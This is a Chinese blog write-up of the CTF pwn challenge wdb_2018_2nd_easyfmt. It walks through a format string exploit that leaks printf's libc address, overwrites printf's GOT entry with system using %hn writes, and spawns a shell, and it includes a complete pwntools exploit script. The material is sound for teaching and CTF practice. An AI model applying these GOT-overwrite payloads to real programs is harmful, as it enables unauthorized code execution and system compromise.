wdb_2018_2nd_easyfmt

已于 2022-12-14 19:58:10 修改
阅读量400 收藏 2
点赞数
文章标签: python 安全
于 2022-12-14 19:54:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43904731/article/details/128321156
版权

wdb_2018_2nd_easyfmt(格式化字符串)

题目情况

程序流程非常简单,一眼格式化字符串漏洞

题目中没法发现其他漏洞或者可用的地方,卡住了,看了一些wp之后知道了格式化字符串还可以通过修改got表来执行system

虽然自己在做的时候跟网上的wp有一些差异,但还是拿到了shell

大致思路

  • 格式化字符串漏洞这里是死循环,则表示可以反复利用

  • 先确定输入数据的参数位置

    看到输入数据的地址 0xffffd0f8

    使用fmtarg指令查看偏移:

    得到了参数位置为第六个参数

  • 第一次利用printf泄露printf的实际地址

     printf_got = elf.got['printf']
 p.recvuntil("Do you know repeater?\n")
 payload = p32(printf_got)
 payload += b"%6$s"
 p.sendline(payload)
 printf_addr = u32(p.recvuntil("\xf7")[-4:])
 print(hex(printf_addr))

  • 拿到printf的地址后就可以使用Libcsearcher确定libc版本然后算出libc基址,算出system函数地址

     libc = LibcSearcher('printf', printf_addr)
 libc_base = printf_addr - libc.dump('printf')
 log.success("libc_base addr is ->%s" % hex(libc_base))
 system_addr = libc_base + libc.dump('system')

  • 然后再次利用printf修改got表里printf的地址为system的地址

    • 先看看需要修改的大小,一共四字节大小可以用两次hn

      其实做完了才发现可以只修改低四位。。。

    • 构造格式化字符串:

       system_low = system_addr & 0xffff
 system_high = (system_addr >> 16) & 0xffff
 payload = p32(printf_got) + p32(printf_got + 2)
 payload += b'%' + bytes(str(system_low - 8), "utf-8") + b'c%6$hn'
 payload += b'%' + bytes(str(system_high-system_low), "utf-8") + b'c%7$hn'

    • 注意这里的一个细节,system_low - 8,这是因为前面构造的printf_got和printf_got+2一共占了8字节所以要减回来,可以看一些如果不减修改的地址的情况:

      可以看到修改的got表低四位地址多了0x8

  • 成功修改后,再次执行printf时其实是执行system,所以第三次执行printf发送‘/bin/sh\x00’

注意点与收获

  • 更加深刻理解了格式化字符串漏洞,也明白了怎么构造格式化字符串

  • 学会了修改got表的方法

  • 终于理解了参数位置的意思(为什么可以做到一字节或两字节修改值)

完整exp

 from pwn import *
 from LibcSearcher import *
 ​
 context(os='linux', arch='amd64', log_level='debug')
 p = process('./pwn')
 gdb.attach(p)
 elf = ELF('./pwn')
 ​
 ​
 def exp(p):
     printf_got = elf.got['printf']
     p.recvuntil("Do you know repeater?\n")
     payload = p32(printf_got)
     payload += b"%6$s"
     p.sendline(payload)
     printf_addr = u32(p.recvuntil("\xf7")[-4:])
     print(hex(printf_addr))
     libc = LibcSearcher('printf', printf_addr)
     libc_base = printf_addr - libc.dump('printf')
     log.success("libc_base addr is ->%s" % hex(libc_base))
 ​
     system_addr = libc_base + libc.dump('system')
     log.success("system addr is ->%s" % hex(system_addr))
     printf_got = elf.got['printf']
     log.success("printf_got addr is ->%s" % hex(printf_got))
 ​
     system_low = system_addr & 0xffff
     system_high = (system_addr >> 16) & 0xffff
     payload = p32(printf_got) + p32(printf_got + 2)
     payload += b'%' + bytes(str(system_low - 8), "utf-8") + b'c%6$hn'
     payload += b'%' + bytes(str(system_high-system_low), "utf-8") + b'c%7$hn'
     
     pause()
     p.send(payload)
     pause()
     print("------------------------------------------------------")
 ​
     pause()
     p.sendline(b"/bin/sh\x00")
     p.interactive()
 ​
 ​
 exp(p)
Code:016
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
easyfmt(xctf)
weixin_43868725的博客
08-20 426
0x0 程序保护和流程 保护: 流程: main() 可以发现在if中存在格式化字符串漏洞。但需要通过CheckIn()的返回值决定是否执行if中的语句。 通过一个time()获取当前时间,并将当前时间当成srand()的seed,之后根据seed产生出的随机数对5取模再加48存放在v3[0]中,之后将输入的值跟v1进行比较返回结果。 0x1 利用过程 1.想要利用格式化字符串漏洞就必须绕过CheckIn()的限制,因为反汇编出来的源码可能会有一点问题,因此对汇编代码进行分析。 通过分析可知程序将随
格式化字符串漏洞的介绍
01-20
自己学习的时候做的一个ppt,是花了一些心血的,希望对别人能够有所帮助。主要是格式化字符串漏洞的一些介绍,还是挺详细的。
[XCTF-pwn] 25_easyfmt
weixin_52640415的博客
03-08 415
格式化字符串漏洞,got.exit劫持,got.printf劫持 这题比上题要简单,先修改got.exit为main进入循环并漏洞libc地址,再将printf改为system,再输入/bin/sh int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[264]; // [rsp+10h] [rbp-110h] BYREF unsigned __int64 v4; // [r
非栈上的格式化字符串利用例题讲解
fzucaicai的博客
03-06 629
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
攻防世界PWN之easy_fmt题解
seaaseesa的博客
02-05 2447
Easyfmt 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 存在一个明显的格式化字符串漏洞,但是只能用一次,后面exit(0)会结束程序 CheckIn需要爆破 是一个随机数,且只有一位,我们直接输入2,成功率1/10 为了不让程序退出,多次利用printf,我们就得利用第一次的printf把exit的got表内容修改为0x400982,这样,我们就能一直处于...
wdb_2018_2nd_easyfmt详解
像初雪一样自由洒落
04-25 1495
wdb_2018_2nd_easyfmt详解 自己做出来了,,,,还看其他人的 参考:wdb_2018_2nd_easyfmt 程序流程 程序流程非常简单,可以一直进行格式化字符串漏洞。 漏洞利用 首先通过格式化字符串泄露栈信息 通过格式化字符串修改printf_got表为system(one_gadget本地打通了,远程没有,,) 发送“/bin/sh\x00”, 详细过程 0.查看基本信息 32位程序,只开了nx winter@ubuntu:~/buu$ file wdb_2018_2nd_e.
从零开始做题:逆向wdb_2018_2nd_easyfmt
weixin_44626085的博客
01-14 759
格式化字符串漏洞如何确定偏移输入AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.输出AAAA.0xffffd658.0x64.0xf7ffdc08.0xf7ffcd00.0xffffd77c.0x41414141.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.
BUUCTF(pwn)wdb_2018_2nd_easyfmt
半岛铁盒的博客
04-03 452
32位格式化字符串修改got表 做题思路 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/sh\0’ from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29087) elf=ELF('./1') printf_got=elf.got['printf'] payload1=p32(printf_got)+"%6$s"
攻防世界(pwn)easyfmt
PLpa的博客
03-02 1056
这题出的很奇怪,本地调试不知道为什么出问题,远程也调了很久才通,希望路过的大佬提出更好的思路和解题方式! 查看一下保护: 开了canary,NX,部分打开RELRO,没开PIE,可以尝试got表的覆盖。 这里不能有时候全信,还是要打开IDA自己分析才行。 可以看到有明显的格式化字符串漏洞,看看怎么利用他。 要运行到格式化字符串漏洞,我们必须完成一个判定,我们进入CheckIn函数看看。 Ch...
格式化字符串之在栈上修改got表,执行system(“/bin/sh“)
fzucaicai的博客
03-05 680
举个例子, payload = fmtstr_payload(7 , {printf_got : system_addr}) 其中,7。
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
vxworks嵌入式系统调试组件配置方案,调试冲突解决措施
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的...
wdb_scraper
03-22
Tutti.ch Webscraper请在笔记本(tutti.ipynb)或找到更多信息
vxWorks_src.rar_mathsoftlib_pentiumALib.h_vxWorks API_vxworks_we
07-15
包含vxWorks的许多底层API源码,如tffs/wdb/dhcp等对于vxWorks的开发有很大帮助
Leader统帅KFR-72LW_02WDB81TU1空调说明书.pdf
02-13
Leader统帅品牌说明书
【 书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建
最新发布
专注大数据与人工智能技术分享,欢迎私信加群互相学习!
05-03 622
本篇笔记内容主要为 【书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建智能体的作业 ,主要对智能体应用理论部分及具体搭建流程详细介绍,并分别进行实战应用及可视化展示,欢迎大家交流学习!
python复习(三)
qq_43710593的博客
04-29 320
类是一种面向。
SpringBoot中实现发送邮件
m0_64289188的博客
04-30 512
当你添加了spring-boot-starter-mail依赖后,Spring Boot会自动配置JavaMailSender实例,并根据application.yml文件中的属性来配置这个实例。你可以直接在需要发送邮件的地方通过@Autowired注解将JavaMailSender实例注入到你的类中,然后使用它来发送邮件。:首先,需要在你的pom.xml文件中添加Spring Boot的邮件发送器依赖。,简化了在Spring Boot应用程序中发送电子邮件的设置过程。Spring Boot的。
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值